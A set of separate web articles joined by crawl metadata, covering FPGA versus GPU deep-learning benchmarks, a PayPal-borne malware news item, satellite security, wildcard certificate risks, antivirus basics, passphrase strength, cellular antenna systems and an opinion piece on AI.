DNNs rely heavily on matrix multiply operations (GEMM). Conventional DNNs rely on FP32 dense GEMM. However, lower precision and sparse emerging DNNs rely on low-precision and/or sparse GEMMs. The Intel team evaluated these various GEMMs.
FP32 Dense GEMM: As FP32 dense GEMM is well studied, the team compared peak numbers on the FPGA and GPU datasheets. The peak theoretical performance of Titan X Pascal is 11 TFLOPs and 9.2 TFLOPs for Stratix 10. Figure 3A shows, Intel Stratix 10 with its far greater number of DSPs will offer much improved FP32 performance compared to the Intel Arria 10, bringing the Stratix 10 within striking distance to Titan X performance.
Low-Precision INT6 GEMM: To show the customizability benefits of FPGA, the team studied 6-bit (Int6) GEMM for FPGA by packing four int6 into a DSP block. For GPU, which does not natively support Int6, they used peak Int8 GPU performance for comparison. Figure 3B shows that Intel Stratix 10 performs better than the GPU. FPGAs offer even more compelling performance/watt than GPUs.
Very Low-Precision 1bit Binarized GEMM: Recent binarized DNNs proposed extremely compact 1bit data type that allows replacing multiplications with xnor and bitcounting operations, which are well-suited for FPGAs. Figure 3C shows the team’s binary GEMM test results, where FPGA substantially performed better than GPU (i.e., ~2x to ~10x across different frequency targets).
Sparse GEMM: Emerging sparse DNNs contain many zeros. The team tested a sparse GEMM on matrix with 85% zeros (chosen based on pruned AlexNet). The team tested a GEMM design that uses FPGA’s flexibility to skip zero computations in a fine-grained manner. The team also tested sparse GEMM on GPU, but found that performance was worse than performing dense GEMM on GPU (of same matrix size). The team’s sparse GEMM test (Figure 3D) shows that FPGA can perform better than GPU, depending on target FPGA frequency.
Figure 4. Trends in DNN Accuracies and Results FPGA and GPU testing on Ternary ResNet DNNs. Courtesy of Intel.
Study 2: Using Ternary ResNet DNNs testing
Ternary DNNs have recently proposed constraining neural network weights to +1, 0, or -1. This allows for sparse 2-bit weights and replacing multiplications with sign bit manipulations. In this test, the team used an FPGA design customized for zero skipping, 2-bit weight, and without multipliers to optimally run Ternary-ResNet DNNs.
Unlike many other low precision and sparse DNNs, ternary DNNs provide comparable accuracy to the state-of-the-art DNNs (i.e., ResNet), as shown in Figure 4A. “Many existing GPU and FPGA studies only target ‘good enough’ accuracy on ImageNet, which is based on AlexNet (proposed in 2012). The state-of-the-art Resnet (proposed in 2015) offers over 10 percent better accuracy than AlexNet. In late 2016, in another paper, we were the first to show that low precision and sparse ternary version DNN algorithm on Resnet could achieve within ~1% accuracy of full-precision ResNet. This ternary ResNet is our target in this FPGA study. So, we’re the first to show that FPGA can offer best-in-class (ResNet) ImageNet accuracy, and it can do it better than GPUs”, states Nurvitadhi.
The performance and performance/watt of Intel Stratix 10 FPGA and Titan X GPU for ResNet-50 is shown in Figure 4B. Even for the conservative performance estimate, Intel Stratix 10 FPGA is already ~60% better than achieved Titan X GPU performance. The moderate and aggressive estimates are even better (i.e., 2.1x and 3.5x speedups). Interestingly, the Intel Stratix 10 aggressive 750MHz estimate can deliver 35% better performance than theoretical peak Titan X performance. In terms of performance/watt, Intel Stratix 10 is 2.3x to 4.3x better than Titan X, across conservative to aggressive estimates.
How FPGAs stacked up in the research tests
The results show that Intel Stratix 10 FPGA is 10%, 50%, and 5.4x better in performance (TOP/sec) than Titan X Pascal GPU on GEMMs for sparse, Int6, and binarized DNNs, respectively. On Ternary-ResNet, the Stratix 10 FPGA can deliver 60% better performance over Titan X Pascal GPU, while being 2.3x better in performance/watt. The results indicate that FPGAs may become the platform of choice for accelerating next-generation DNNs.
The Future of FPGAs in Deep Neural Networks
Can FPGAs beat GPUs in performance for next-generation DNNs? Intel’s evaluation of various emerging DNNs on two generations of FPGAs (Intel Arria 10 and Intel Stratix 10) and the latest Titan X GPU shows that current trends in DNN algorithms may favor FPGAs, and that FPGAs may even offer superior performance. While the results described are from work done in 2016, the Intel team continues testing Intel FPGAs for modern DNN algorithms and optimizations (e.g., FFT/winograd math transforms, aggressive quantizations, compressions). The team also pointed out FPGA opportunities for other irregular applications beyond DNNs, and on latency sensitive applications like ADAS and industrial uses.
“The current ML problems using 32-bit dense matrix multiplication is where GPUs excel. We encourage other developers and researchers to join forces with us to reformulate machine learning problems to take advantage of the strength of FPGAs using smaller bit processing because FPGAs can adapt to shifts toward lower precision,” says Huang.
Can FPGAs beat GPUs in Accelerating Next-Generation Deep Neural Networks published in ACM Digital Library, February 2017.
This article was sourced via our relationship with Intel HPC editorial program. | <urn:uuid:43dba3aa-aedd-470f-83e7-ce6cb3f2357e> | CC-MAIN-2022-40 | https://www.nextplatform.com/2017/03/21/can-fpgas-beat-gpus-accelerating-next-generation-deep-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00340.warc.gz | en | 0.892681 | 3,002 | 2.5625 | 3 |
Spreading viruses trough email spam is nothing new. Most viruses mimic legitimate services to get users to click on their malicious connection and get infected. It’s rare, however, for email sent from legitimate source to be infected with malware. This is exactly what happened to PayPal recently. The attack was reported by ProofPoint.
How Did the Chthonic Spread?
The Scale of the PayPal Attack Was Small
ProofPoint reports that the malicious connection was click 27 times, which is a small number when it comes to virus infection. While that’s good, the troubling part of the story is that neither Google nor PayPal detected the virus before it was already sent to users. It goes to show that even big companies aren’t safe from crafty hacking. Always be careful while clicking on anything sent by email.
Email Spam Campaigns and Viruses
The tactic used by Chthonic virus is rather unconventional, as most virus campaigns merely mimic big companies without hijacking their legitimate email services. The most common way of spreading malware is to mask the malicious email to look like they’re sent from legitimate companies like Microsoft, or indeed, PayPal. These emails often include an urgent sounding title like “Your account has expired”, “There was an unauthorized transaction” or “Your computer is at risk.” While this is also a dangerous trick, it’s much easier to tell the fake emails apart from the real ones. These emails aren’t sent by the legitimate email address of the companies they’re claiming to be from. You can check a link by putting your mouse cursor on it without clicking. A small textbox will appear, showing you the URL of the connection. If it’s something shady or disingenuous, don’t click it. Another email trick is the tech support scam. Again, crooks use emails that resemble those of a legitimate service and try to trick people into doing something harmful to them. Often, it’s demanding money to solve a fictitious problem. User vigilance can eliminate most cyber-security risks. If that fails, then you can try to remove the problem by consulting an anti-malware/ anti-PUP guide. | <urn:uuid:48de04cd-c234-46bd-8e06-0c9fe34d2576> | CC-MAIN-2022-40 | https://bestsecuritysearch.com/chthonic-trojan-virus-spread-paypal-emails/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00540.warc.gz | en | 0.917729 | 600 | 2.96875 | 3 |
As satellite operators move ground control services to the cloud, scientists are trying to anticipate how space weather could affect the future deployment of data centers outside Earth.
The pace of space commercialization has been accelerating for several years now. According to data gathered by the Union of Concerned Scientists, an MIT-based non-profit organization, 699 satellites were launched into space in the first four months of this year, more than in 2017 and 2018 combined.
The uptick is mainly driven by private space companies such as SpaceX. Elon Musk's venture alone runs over a third of all operational satellites currently in orbit and is promising to launch another 42,000 over the next decade. This commercialization of space has ended the government monopoly and created a demand for businesses servicing the newly launched space assets.
According to Paul Coggin, a cybersecurity expert and scientist, his peers all over the world should be taking note, as space is the new frontier for innovation. For example, tech giants such as Amazon, Microsoft, and Google have started offering cloud-based ground control services for companies with assets in orbit.
"From a cybersecurity professional standpoint, it's fascinating that data centers that we used to have here on Earth are now moving to space,"Paul Coggin, a cybersecurity expert and scientist, said.
"From a cybersecurity professional standpoint, it's fascinating that data centers that we used to have here on Earth are now moving to space. There are companies that are planning to launch satellites and provide cloud-based services up in space now," Coggin said at the SEC-T - 0x0EXPAND conference in Stockholm.
Coggin claims that the transition will raise many questions, such as how security experts will do incident forensics and response when some of the affected assets are not on this planet. However, solving these problems will create new industries, equipped to help satellite operators secure their devices.
Space vs security
Transition to the cloud has been a security issue here on Earth, and space is hardly any different. However, securing devices off-planet has its challenges. For one, communication with space assets can only be carried out via signals. Though old-school radio frequency-based comms are gradually being replaced with laser-based technology, problems remain.
For example, space weather – an ionized particle stream emitted by the Sun – prevents satellite operators from encrypting data that's being transmitted. According to Coggin, encryption in space would require additional gear aboard the satellites, ballooning the price of the spacecraft and the services it provides.
"The solution to securing satellites is radiation hardening to protect from the ions. But that drives up the cost. Encryption is heavily recommended, and everyone talks about it. But unless it's a very sensitive network satellite, most likely it is not being encrypted," Coggin explained.
According to Coggin, threat actors are well aware of the lack of encryption and have used this vulnerability to their benefit. For example, in the mid-90s Brazil-based hackers infiltrated a satellite owned by the US Navy and used the device for personal communication. Even though satellite operators were aware of this, there was little they could do, as rewiring an in-orbit device is a monumental task even for a resource-rich US military.
Moreover, making arrests did not decisively solve the problem, as the vulnerability exploited by the malicious hackers remained unpatched.
"The authorities finally got 39 people across six states in Brazil arrested, but by that time new people started using the satellite because it was still open," Coggin explained.
One way to prevent outsiders exploiting a device that a company has spent a small fortune developing and maintaining off-planet is to change the whole architecture. According to Coggin, software-defined satellites are an emerging design that will allow device configurations to be changed even after they have been launched into space.
However, to secure satellites and the communication signals they transfer, future developers will have to find a more unified approach to how satellite software works. For example, current in-orbit devices run on dozens of operating systems, and numerous protocols control them.
While the multitude of software used to operate spacecraft makes it much harder to hack them without expert knowledge, it also makes detecting potential threats a nightmare.
"If we want to start doing space threat-hunting, there's a whole lot of operating systems and protocols and command languages that we're going to have to get tooled up for, depending on what our domain of responsibility is," Coggin said.
Interestingly, technologies with cloud-based architecture are deployed to help satellite operators increase security. Companies send software-defined satellites that can run container-based virtual machines (VM) in space. This technique could eliminate an insecure container without affecting the satellite.
"If you discover there might have been a security breach, maybe you could go and pull back an old version of that container, put it back in operation, and take the suspect container out," Coggin said.
More from Cybernews:
Subscribe to our newsletter | <urn:uuid:bc643719-5949-40e0-808b-e5446f84c36e> | CC-MAIN-2022-40 | https://cybernews.com/tech/how-space-weather-hinders-satellite-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00540.warc.gz | en | 0.962012 | 1,036 | 3.09375 | 3 |
World’s Smallest MRI Machine Could Usher in the Quantum Computing Era
(TechWizeNow) A newly developed world’s smallest MRI machine can do even more and could give birth to the long-awaited quantum computing era. Researchers at the Center of Quantum Nanoscience (QNS) of Ewha Woman’s University, South Korea developed the miniaturized MRI device in collaboration with colleagues from the US. The team has announced performing the world’s smallest magnetic resonance imaging, which visualizes the magnetic field of a single atom.
The researchers were able to image and probe a single atom by scanning across the surface of an atomically sharp metal tip in a Scanning Tunneling Microscope, a device for imaging and probing individual atoms. Two magnetic elements: iron and titanium were investigated in the study. Precise preparation of the sample made the atoms visible in the microscope, allowing the scientists to map the three-dimensional magnetic field generated by the atoms using the microscope’s tip.
This newly developed world’s smallest MRI device could usher in another level of development in drugs manufacturing, creation of new materials and in developing better quantum computing systems. | <urn:uuid:850d23a1-ebae-4b82-9ba9-1b102923ff90> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/worlds-smallest-mri-machine-usher-quantum-computing-era/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00540.warc.gz | en | 0.915122 | 242 | 2.734375 | 3 |
SSL/TLS certificates issued by trusted Certificate Authorities (CAs), either public or private, are used to authenticate a single domain in public facing websites. Organizations with a handful of public domains and subdomains would have to issue and manage an equal number of digital certificates, increasing the complexity of certificate lifecycle management. The good news is that there is a solution to bypass this burden.
Wildcard certificates promise simplicity, but are they the solution to all our prayers?
What is a Wildcard Certificate?
Let’s start with a definition. Simply put, a wildcard certificate is a public key certificate that can be used on multiple subdomains. For example, a wildcard certificate issued for https://*.examplecompany.com could be used to secure all subdomains, such as:
Here comes the obvious benefit of using wildcard certificates: with a single digital certificate, I can secure and authenticate all my public facing subdomains, avoiding the hassle of managing multiple certificates. Instead of purchasing separate certificates for my subdomains, I can use a single wildcard cert for all domains and subdomains across multiple servers.
However, wildcard certificates cover only one level of subdomains since the asterisk does nοt match full stops. In this case, the domain resources.blog.keyfactor.com would not be valid for the certificate. Neither is the naked domain keyfactor.com covered, which will have to be included as a separate Subject Alternate Name.
Benefits of Wildcard Certificates
SSL wildcard certificates can be very helpful for organizations seeking to secure a number of subdomains, while looking for flexibility. The key strengths of wildcard certificates are:
- Secure unlimited subdomains: A single wildcard SSL certificate can cover as many subdomains as you want, without having to install a separate certificate for each subdomain.
- Ease of certificate management: Deploying and managing effectively individual SSL certificates to secure an increasing number of public facing domains, cloud workloads and devices is a daunting task. Wildcard certificates make the management of certificates a piece of cake.
- Cost savings: Although the cost of issuing a wildcard certificate is higher than a regular SSL certificate, it is a cost-effective option especially if you consider the total cost required to secure all your subdomains by their own certificate.
- Flexible and fast implementations: Wildcard certificates are the perfect option to launch new sites on new subdomains, which can be covered by your existing certificate. There is no need to wait for a new SSL certificate to be issued, saving you time and expediting time to market.
3 Security Risks That Will Make You Think Twice
Wildcard certificates are used to cover all listed domains with the same private key making it easier to manage. Despite the benefits, the use of wildcard certificates creates significant security risks since the same private key is used across dispersed systems, increasing the risk of an organization-wide compromise.
01 | A single point of failure
If the private key of an ordinary SSL certificate is compromised, only the connections to the individual server listed in the certificate are affected and the damage is easy to be mitigated. On the other hand, the private key of a wildcard certificate is a single point of a total compromise. If that key is compromised, all secure connections to all servers and subdomains listed in the certificate will be compromised.
02 | Private key security
The above point, raises another one problem: How do you effectively and securely manage that private key across so many distributed servers and teams? Practice has shown that stolen or otherwise mishandled private keys is a root cause for masquerading attackers’ footprints and look like legitimate. Gaining access to a wildcard certificate’s private key provides attackers with the ability to impersonate any domain covered by the wildcard certificate. In addition, cybercriminals can leverage a compromised server to host malicious sites for phishing campaigns. It only takes one server to be compromised and all the others will be vulnerable.
03 | Renewal risks
If the wildcard certificate is revoked, the private key will need to be updated on all servers that use that certificate will need to be updated. And this update will have to take place at one time to avoid disrupting the smooth flow of data. The same applies when the wildcard certificate expires. Updating revoked or nearly expired wildcard certificates results in significant work, which can be even harder depending on the geographic distribution of the covered servers and the level of visibility you have on your infrastructure. If the wildcard certificate is not renewed in time, you could face a significant outage, disrupting business continuity.
The Need for Visibility & Automated Renewal
Before planning on whether to use wildcard certificates or not, you should define the objectives to be met by deploying these certificates. Wildcard certificates can have a valid use case in a few limited circumstances.
On the other hand, you should never use wildcard certificates on production systems. Instead, you should opt for domain-specific certificates that are rotated often. A compromised wildcard certificate can have serious implications which can be mitigated by using short-lived SSL/TLS certificates.
Whether you are using wildcard certificates or not, you will need to ensure that you have visibility into every certificate your organization possesses and establish processes to renew or replace them. Except for limiting the use of wildcard certificates in your organization, here is what you must do to ensure an effective certificate lifecycle management:
- Keep an accurate and up-to-date inventory of certificates in your environment, documenting key length, hash algorithm, expiry, locations, and the certificate owner.
- Ensure that private keys are stored and protected according to industry’s best practices (i.e., using a certified HSM).
- Automate certificate renewal, revocation, and provisioning processes to prevent unexpected expirations and outages.
Certificate lifecycle automation tools like Keyfactor Command are built to address these challenges. The rapid growth in the number of keys and certificates in organizations has rendered manual and homegrown methods obsolete. But before you go out and shop around for a certificate management platform, make sure you have documented your requirements and that the candidate platform is the solution to your needs.
Get a quick overview of how Keyfactor enables visibility, agility, and control over your keys and certificates. | <urn:uuid:1e637303-2135-45cb-af51-e685f7bb9378> | CC-MAIN-2022-40 | https://www.keyfactor.com/blog/wildcard-certificate-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00540.warc.gz | en | 0.910566 | 1,326 | 2.71875 | 3 |
Antivirus programs depend on stored virus signatures — unique strings of data that are characteristic of known malware. The antivirus software uses these signatures to identify when it encounters viruses that have already been identified and analyzed by security experts.
How do antivirus detect viruses?
Antivirus software compares the signatures of the files on your system to the virus signatures in the signature database to see if any signatures match. If they do, a virus has been detected. This method works well for detecting known malware.
What happens when an antivirus program detects a virus?
An antivirus software works by scanning incoming files or code that’s being passed through your network traffic. Companies who build this software compile an extensive database of already known viruses and malware and teach the software how to detect, flag, and remove them.
Which program is used to detect virus?
Antivirus software, or anti-virus software (abbreviated to AV software), also known as anti-malware, is a computer program used to prevent, detect, and remove malware. Antivirus software was originally developed to detect and remove computer viruses, hence the name.
What are the three best methods of virus detection?
Virus Detection Methods Top
There are four major methods of virus detection in use today: scanning, integrity checking, interception, and heuristic detection. Of these, scanning and interception are very common, with the other two only common in less widely-used anti-virus packages.
What is heuristic based detection?
Heuristic analysis is a method of detecting viruses by examining code for suspicious properties. … Heuristic analysis is incorporated into advanced security solutions offered by companies like Kaspersky Labs to detect new threats before they cause harm, without the need for a specific signature.
What do antivirus programs do?
Software that is created specifically to help detect, prevent and remove malware (malicious software). Antivirus is a kind of software used to prevent, scan, detect and delete viruses from a computer.
What is antivirus detection?
In order to deliver adequate computer protection, antivirus software should be capable of: Detecting a very wide range of existing malicious programs — ideally, all existing malware. Detecting new modifications of known computer viruses, worms and Trojan viruses.
Does anti virus only detect viruses?
Antivirus software, originally designed to detect and remove viruses from computers, can also protect against a wide variety of threats, including other types of malicious software, such as keyloggers, browser hijackers, Trojan horses, worms, rootkits, spyware, adware, botnets and ransomware.
What is the most common method used to identify viruses?
PCR is one of the most widely used laboratory methods for detection of viral nucleic acids.
What is direct detection of virus?
Direct Detection. A variety of approaches can be used for direct detection of viruses: cell culture (virus isolation), electron microscopy, fluorescent antibody (FA) testing, immunohistochemistry, ELISA, and nucleic acid testing.
What is used to identify and study of viruses?
Cultured cells are often used to study basic steps in virus replication. Viruses can be purified away from cellular proteins and organelles using centrifugation techniques. Most viruses cannot be seen using standard light microscopes, but are often imaged using electron microscopy. | <urn:uuid:aaa8fde1-39fc-4c99-a375-7ffcfaeba5cf> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/how-do-antivirus-programs-detect-and-identify-a-virus.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00540.warc.gz | en | 0.910679 | 695 | 3.671875 | 4 |
I’ve heard all kinds of methods for creating passwords. Including but certainly not limited to adding symbols at the beginning or end or using numbers instead of vowels. One method I’ve used for years was the combination of a color and an animal replacing vowels with numbers… and usually adding an exclamation to the end. I thought this was pretty good until I saw this cartoon.
A common way to reveal or hack a password is to use a piece of software that runs through each and every variation of characters in a sequential manner until the password is broken. If I were to use that type of software on the password “Gr@p3@p3” (Grape Ape), it would take the program roughly 2 days for the software to break it.
If instead I put together four common words that are easy for me to remember (like in the example shown in the image above) “correct horse battery staple”, it would take that same piece of software 550 years to crack it.
What four random words can you come up with?
Image courtesy of XKCD | <urn:uuid:5c23d9a1-1aa9-44bf-9a73-86a770b4d880> | CC-MAIN-2022-40 | https://www.fcnaustin.com/how-strong-is-your-password/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00540.warc.gz | en | 0.950861 | 228 | 2.578125 | 3 |
This is the finding of a study from Uppsala University published in the journal JAMA Network Open. In patients with B cell counts of 40/µL (microlitres) or more, 9 of 10 patients developed protective levels of antibodies, while significantly fewer with lower counts had similar responses.
“In our study, the B cell level in patients given Rituximab was the only factor that influenced the ability to form antibodies after vaccination. Previously, it was assumed that it was enough to wait a certain period after administering Rituximab for the vaccine to have a good effect. But to increase the chance of the vaccine causing the body to form antibodies, you first need to measure the level of B cells and ensure there are enough,” says Andreas Tolf, a doctoral student in experimental neurology at Uppsala University and physician at Uppsala University Hospital.
In Sweden, Rituximab is the most common medicine for MS, but it is also used for many other diseases. The medicine is given as a drip, normally once or twice a year, and has a documented good effect on slowing the progression of MS.
The treatment knocks out the body’s B cells, which are an important part of our immune system though they also contribute to the MS disease process. As a result, the treatment increases the risk of patients suffering from serious infections, such as COVID-19.
Having low levels of B cells also makes it more difficult for the body to form protective antibodies against viruses and bacteria, which is the primary purpose of vaccinations. In this case, this concerns the S protein in the SARS-CoV-19 virus.
Researchers at Uppsala University and Uppsala University Hospital have studied how MS patients treated with Rituximab react to vaccination against COVID-19. The purpose was to determine the optimal level of B cells for the patient to form sufficient numbers of antibodies after vaccination.
Blood from a total of 67 individuals with MS was analyzed, of whom 60 were undergoing treatment with Rituximab and 7 were going to begin treatment after their COVID-19 vaccinations. Blood samples were taken before and after vaccination to study the levels of B cells and antibodies for SARS-CoV-2.
The patients received two doses of Pfizer’s COVID-19 vaccine Comirnaty, with the active substance tozinameran.
The results show that the levels of B cells varied greatly among the subjects. The longer a patient had been treated with Rituximab, the longer it took their B cells to recover. For some patients, it took over a year before the B cells began to come back.
The patients who responded best to the vaccine and formed sufficiently high levels of antibodies had on average 51 B cells per microlitre (µL) before the vaccination. For the group that did not reach sufficient levels, the average was 22 B cells/µL.
“There was a threshold with a level of B cells at 40/µL or more where 90 percent formed protective levels of antibodies. Of the patients who were undergoing MS treatment with Rituximab, 72 percent formed sufficiently high levels of antibodies. The best effect with the highest percentage of antibodies was found in subjects who had never been treated with Rituximab,” says Anna Wiberg, a researcher in clinical immunology at the Department of Immunology, Genetics and Pathology at Uppsala University.
The ability of the T cells to react to the virus was just as strong in those who had received treatment. The levels of B cells before vaccination also did not impact the T-cell response, which suggests that all patients have a certain benefit from the vaccination, even if antibodies are not formed.
Since the emergence of the COVID-19 pandemic, much has been learned about the complex immune response to SARS-CoV-2 infection . Successful viral clearance is linked to careful coordination between antibody-producing B-cells, CD4 + T-cells, and CD8 + T-cells, while asynchrony among these branches of the adaptive immune system has been implicated in poor clinical outcomes .
Rituximab is a chimeric monoclonal antibody that targets the CD-20 antigen on B-lymphocytes and is indicated for the treatment of a number of hematologic and non-hematologic conditions. The administration of rituximab is associated with rapid B-cell depletion and secondary hypogammaglobulinemia, recovery from which may take up to 12 months .
During this period of lymphopenia, patients are susceptible to a well-described increase in infectious complications due to impaired opsonization and an inability to generate antibodies in response to new antigens . Given rituximab’s long-lasting effects on the humoral response to infection, we sought to evaluate the impact of prior rituximab therapy on antibody formation to COVID-19 and clinical outcomes from SARS-CoV-2 infection.
reference link: https://link.springer.com/article/10.1007/s00277-021-04662-1
Original Research: Open access.
“Factors Associated With Serological Response to SARS-CoV-2 Vaccination in Patients With Multiple Sclerosis Treated With Rituximab” by Andreas Tolf et al. JAMA Network Open | <urn:uuid:9f77b618-a17e-40e1-951f-cd3b3943e5d8> | CC-MAIN-2022-40 | https://debuglies.com/2022/05/13/multiple-sclerosis-patients-who-take-rituximab-have-a-better-response-to-the-covid-19-vaccine-if-they-have-a-higher-b-cell-count/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00740.warc.gz | en | 0.953778 | 1,141 | 3.421875 | 3 |
By Lisa Crewe | Posted on July 28, 2022
People from various parts of the world are reporting a strange light in the sky or a string of lights that travel across the sky before fading away. Some think they just saw a shooting star. However, in many cases, this was a satellite…or a group of satellites that were just launched into space. The reason people can see them is largely due to recent advancements in low-cost rocket technology that have enabled more widespread deployment of Low Earth Orbit (LEO) satellites. Unlike traditional satellites that orbit up to 36,000 km above the earth’s surface, LEO satellites hover at less than 2,000 km (about half the width of the United States) above the earth’s surface, making them easier and more affordable to launch at scale.
Connecting the Un-Connected with LEO Satellites
Current statistics show that more than a third of the world’s population is currently without internet access. LEO satellites can play a significant role in closing this digital divide because they can be distributed to provide connectivity to anywhere it’s needed on earth. With advancements in rocket launch technology, LEO satellites require less energy to deploy and less power for transmissions because they are closer to earth. This makes them more affordable and easier to replace. Their proximity to earth also provides lower transmit/receive latency compared to traditional satellites, enabling the use of more latency sensitive applications that were not viable with a traditional satellite network. For these reasons, many companies around the world have been getting into the business of LEO satellites to create a communication network in space.
As noted by the World Economic Forum in February 2022, below are just a few of the more notable LEO constellation launches:
- SpaceX’s Starlink has deployed nearly 2,000 satellites in orbit and has applied for licenses to fly more than 40,000 satellites.
- Amazon has announced plans to deploy more than 3,000 satellites later this year.
- The European Union is developing a LEO satellite system worth €6 billion.
These networks are like the worldwide telecommunications infrastructure we have on earth, except instead of sending signals across fiber optic cables, signals are sent via laser beams through free space.
Why Optical Communications Technology?
Just as key fiber optic advancements helped to improve our global telecommunications infrastructure, these technologies can be used to power the future of space communications. Leveraging technologies such as coherent optical networking, the terrestrial communications industry has been able to migrate to higher performing networks, and today we are reaping the rewards with next generation 400G, 600G and even 1.2 Terabit network speeds. Coherent technology is evolving rapidly and continuing to push the envelope on low power consumption, performance, cost, and small form factors. These are attributes that can be key for building an inter-satellite communications network.
Optical communication in space uses what is referred to as “free space optics (FSO)”. With FSO, data can be transmitted at high speeds by laser beams outside the visible spectrum. Free space optics has been used for many years between satellites with 10 Gbps capacity. Today there is massive deployment of FSO due to the increased LEO constellation launches. This has led to the need for 100 Gbps and above speeds leveraging high Rx sensitivity coherent technology receivers to meet the large data traffic demand between satellites.
Our Connected World
As this space network evolves and connects to our global terrestrial telecommunications network, there can be many benefits. For some that may mean more bandwidth for existing and new applications, while for others it may mean that wireless communications are more affordable such as on airplanes, in the ocean or in remote areas.
Airplanes could soon provide faster, more secure, and more affordable communications for passengers by leveraging these space networks. And for the more than a third of the global population without internet access, it has the potential to bring education to rural areas, create jobs, and help people rise out of poverty. It can even help during natural or man-made disasters when terrestrial networks are knocked out, bringing emergency internet connectivity to wherever it’s needed. For example, according to Reuters, SpaceX made its Starlink satellite broadband service available in Ukraine after its communication services were disrupted as a result of the Russian invasion.
It is exciting to see the innovation and product development taking place to build out a large-scale space communication network. While there are challenges to overcome, there is already so much innovation taking place. At Acacia, we believe satellite technology can enable the next generation of broadband infrastructure and we’re excited that high-capacity transmission enabled by our coherent technology could help make these revolutionary networks possible. | <urn:uuid:dd0f1e7d-28be-45e3-a6cb-cff2d5daf89a> | CC-MAIN-2022-40 | https://acacia-inc.com/blog/optical-communications-in-space/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00740.warc.gz | en | 0.9446 | 957 | 3.453125 | 3 |
Urban areas in USA, of each size; are being drawn nearer by mobile phone suppliers or their specialists about setting a “Distributed Antenna System (DAS)” in the city’s privileges of-way. Basically, DAS is a more current innovation that is assumed to give better inclusion in urban regions through some “little” cell sites, as opposed to enormous towers. Under current law, a city has finish command over its privileges of-path in connection to these frameworks. That implies a city can permit these offices, deny them, or control them as it sees fit. Additionally, as opposed to the statements of a few organizations, a city can charge a sensible rental expense for the utilization of its rights-of-way.
A distributed antenna system, or DAS, is a cellular system that is used inside buildings that have weak cellular coverage. If the building neither receives a signal nor has a very strong signal, the DAS system will be used to amplify the coverage in the building as long as the roof has a good cellular signal. Read on to learn more about DAS systems and how they are used.
Some buildings and facilities don’t get good cellular signals inside of the building and only have good reception on the roof. The DAS system will use multiple server antennas to boost the signal inside of the building so that there is cellular reception inside of the building. this is known as in building DAS The number of servers is going to depend on how big the building is.
Passive DAS is a common type of DAS system that uses donor fed BDAs to send the signal to multiple antennas within the building. This system works best if the building is less than 125,000 square feet and isn’t completely made of concrete or brick that block the signal. The server antennas usually daisy chain off the BDA. Couplers, taps, and splitters are used to balance the signal. The passive DAS system is also the most affordable.
Another option is the active DAS system. This system uses BDAs that are donor fed to send the signal into equipment that converts the RF so it can be distributed to the server antennas. Each carrier is going to need a separate BDA and the signal is refined with taps and splitters. This system works well in buildings that are denser or are made mainly of brick and concrete. If the passive system isn’t strong enough, the active system is the right choice, but it is also the most expensive choice.
The hybrid DAS system combines features of both the active and passive systems. The features that you choose will be based on the type of building you are dealing with and how strong the signal is. The hybrid system will typically use coaxial BDAs that daisy chain to different IDFs.
When you consult with a Decypher Technologies DAS Installation experts, you will get advice on how to move forward with your DAS system. You will want to choose a system that meets your needs and that is also in your budget. We, at Decyphertech, will guide you through the process so you get just what you need. | <urn:uuid:90d080cb-59d2-4f38-920e-be61dd379740> | CC-MAIN-2022-40 | https://decyphertech.com/what-you-need-to-know-about-das-cellular/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00740.warc.gz | en | 0.961107 | 647 | 2.953125 | 3 |
The term ‘’Artificial Intelligence’’ was coined with the ultimate desire to create technology more intelligent and smarter than humans. Since that time, several AI pieces of research has experienced many ups and downs. But, ever since the rise of machine learning, especially deep learning, it seems that AI is gaining momentum, with each success story almost every day.
Today AI is leading the way to change life on Earth for the betterment of the surrounding environment. AI is capable of performing tasks that seemed impossible before and are also out of the reach of humans. There have been significant breakthroughs in the field of machine learning. ALL these concepts have allowed machines to analyze information themselves and perform in a sophisticated manner. It implies that AI systems are outperforming humans.
This post is my personal opinion regarding how AI has outperformed humans, followed by how AI is helping in cybersecurity. So, let’s find out more about it.
How has AI outwitted humans?
In today’s technologically advanced world, we often see a variety of tasks that AI systems do in a much better way than human beings. Humans don’t have countless abilities and skills. For this reason, we are capable of certain things, but as shown by AI systems like AlphaGo and Watson, humans are outwitted by machines while performing most of the individual’s tasks, no matter how challenging they appear at first.
There are some natural limitations in the productivity of the human brain. A human can surely turn to experts for help in assessing the potential of investing in a startup, but what if we need to examine the possibility of several thousand rather than a single company?
There is no expert and even a group of experts who would efficiently process such a significant volume of information. However, the use of AI makes such issues resolvable. Like for instance, Squilla Capital uses Artificial Intelligence along with Big Data to analyze more than eight thousand startups by using such metrics as web and social media analytics, trading blockchain data, and others.
Human beings excel at using their experience, imagination, and judgment to put better security strategies in place and improve the overall security posture. It means that if they are not being warned by alerts and incidents, they might suffer badly. Thanks to AI, which alerts them before time, they can get back to what they do best.
